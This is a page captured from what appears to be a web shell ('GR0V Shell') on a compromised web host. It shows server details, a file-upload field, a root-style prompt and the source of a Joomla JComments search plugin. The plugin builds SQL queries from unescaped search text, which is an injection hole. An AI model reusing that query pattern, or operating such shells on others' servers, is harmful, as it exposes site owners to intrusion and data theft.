? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/promice/plugins/search/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/promice/plugins/search/jcomments.php

<?php
/**
 * JComments - Joomla Comment System
 *
 * Search mambot
 *
 * @version 2.0
 * @package JComments
 * @author Sergey M. Litvinov (smart@joomlatune.ru)
 * @copyright (C) 2006-2009 by Sergey M. Litvinov (http://www.joomlatune.ru)
 * @license GNU/GPL: http://www.gnu.org/copyleft/gpl.html
 *
 * If you fork this to create your own project, 
 * please make a reference to JComments someplace in your code 
 * and provide a link to http://www.joomlatune.ru
 **/

// ensure this file is being included by a parent file
(defined('_VALID_MOS') OR defined('_JEXEC')) or die('Direct Access to this location is not allowed.');

global $mainframe;

// define directory separator short constant
if (!defined('DS')) {
	define('DS', DIRECTORY_SEPARATOR);
}

if (defined('JPATH_ROOT')) {
	include_once (JPATH_ROOT . DS . 'components' . DS . 'com_jcomments' . DS . 'jcomments.legacy.php');
} else {
	global $mosConfig_absolute_path;
	include_once ($mosConfig_absolute_path . DS . 'components' . DS . 'com_jcomments' . DS . 'jcomments.legacy.php');
}
	
// if component doesnt exists (may be already uninstalled) - return
if (!defined('JCOMMENTS_JVERSION')) {
	return;
}

if (JCOMMENTS_JVERSION == '1.0') {
	global $_MAMBOTS;
	$_MAMBOTS->registerFunction('onSearch', 'plgSearchJComments');
} else if (JCOMMENTS_JVERSION == '1.5') {
	$mainframe->registerEvent('onSearch', 'plgSearchJComments');
	$mainframe->registerEvent('onSearchAreas', 'plgSearchJCommentsAreas');

	JPlugin::loadLanguage( 'plg_search_jcomments' );
}

if (!function_exists('sefreltoabs')) {
	function sefRelToAbs( $s )
	{
		return $s;
	}
}

/**
 * @return array An array of search areas
 */
function &plgSearchJCommentsAreas()
{
	static $areas = array('comments' => 'Comments');
	return $areas;
}

/**
* Comments Search method
*
* The sql must return the following fields that are used in a common display
* routine: href, title, section, created, text, browsernav
* @param string Target search string
* @param string mathcing option, exact|any|all
* @param string ordering option, newest|oldest|popular|alpha|category
* @param mixed An array if restricted to areas, null if search all
*/
function plgSearchJComments( $text, $phrase='', $ordering='', $areas = null )
{
	$text = trim($text);
	
	if ($text == '') {
		return array();
	}
	
	if (is_array($areas)) {
		if (!array_intersect($areas, array_keys(plgSearchJCommentsAreas()))) {
			return array();
		}
	}

	require_once (JCOMMENTS_BASE . DS . 'jcomments.class.php');

	$dbo = & JCommentsFactory::getDBO();
	
	require_once (JCOMMENTS_HELPERS . DS . 'plugin.php');
	require_once (JCOMMENTS_HELPERS . DS . 'contentplugin.php');
	require_once (JCOMMENTS_HELPERS . DS . 'object.php');
	
	$pluginParams = JCommentsPluginHelper::getParams('jcomments.search', 'search');
	$limit = $pluginParams->def('search_limit', 50);

	if (file_exists(JCOMMENTS_BASE . DS . 'jcomments.php')) {
		require_once (JCOMMENTS_BASE . DS . 'jcomments.php');
		
		switch ($phrase) {
			case 'exact':
				$where = "LOWER(comment) LIKE '%$text%'";
				break;
			case 'all':
			case 'any':
			default:
				$words = explode(' ', $text);
				$wheres = array();
				foreach ($words as $word) {
					$wheres2 = array();
					$wheres2[] = "LOWER(name) LIKE '%$word%'";
					$wheres2[] = "LOWER(comment) LIKE '%$word%'";
					$wheres[] = implode(' OR ', $wheres2);
				}
				$where = '(' . implode(($phrase == 'all' ? ') AND (' : ') OR ('), $wheres) . ')';
				break;
		}
		
		switch ($ordering) {
			case 'oldest':
				$order = 'date ASC';
				break;
			case 'newest':
			default:
				$order = 'date DESC';
				break;
		}

		$query = "SELECT "
				. "\n  comment      AS text"
				. "\n, date         AS created"
				. "\n, '2'          AS browsernav"
				. "\n, '".JText::_('HEADER')."'   AS section"
				. "\n, ''           AS href"
				. "\n, id"
				. "\n, object_id"
				. "\n, object_group"
				. "\nFROM #__jcomments "
				. "\nWHERE published='1'"
				. (JCommentsMultilingual::isEnabled() ? "\nAND lang = '" . JCommentsMultilingual::getLanguage() . "'" : "")
				. "\n AND ($where) "
				. "\nORDER BY object_id, $order";

		$dbo->setQuery($query, 0, $limit);
		$rows = $dbo->loadObjectList();
		
		$result = array();
		$cnt = count($rows);

		if ($cnt > 0) {

			$last_object_id = -1;
			$object_link = '';
			
			$acl = & JCommentsFactory::getACL();

			for ($i = 0; $i < $cnt; $i++) {
				if ($rows[$i]->object_id != $last_object_id) {
					$last_object_id = $rows[$i]->object_id;
					$object_link = JCommentsObjectHelper::getLink($rows[$i]->object_id, $rows[$i]->object_group);
					$object_title = JCommentsObjectHelper::getTitle($rows[$i]->object_id, $rows[$i]->object_group);
				}
				
				$rows[$i]->href = $object_link . '#comment-' . $rows[$i]->id;
				
				$comment = JCommentsText::cleanText($rows[$i]->text);
				
				if ($acl->check('enable_autocensor')) {
					$comment = JCommentsText::censor($comment);
				}


				if ($comment != '') {
					$rows[$i]->title = $object_title;
					$rows[$i]->text = $comment;
					$result[] = $rows[$i];
				}
			}
		}
		unset($rows);
		
		return $result;
	}
	return array();
} 
?>

T1KUS90T
  root-grov@210.1.60.28:~$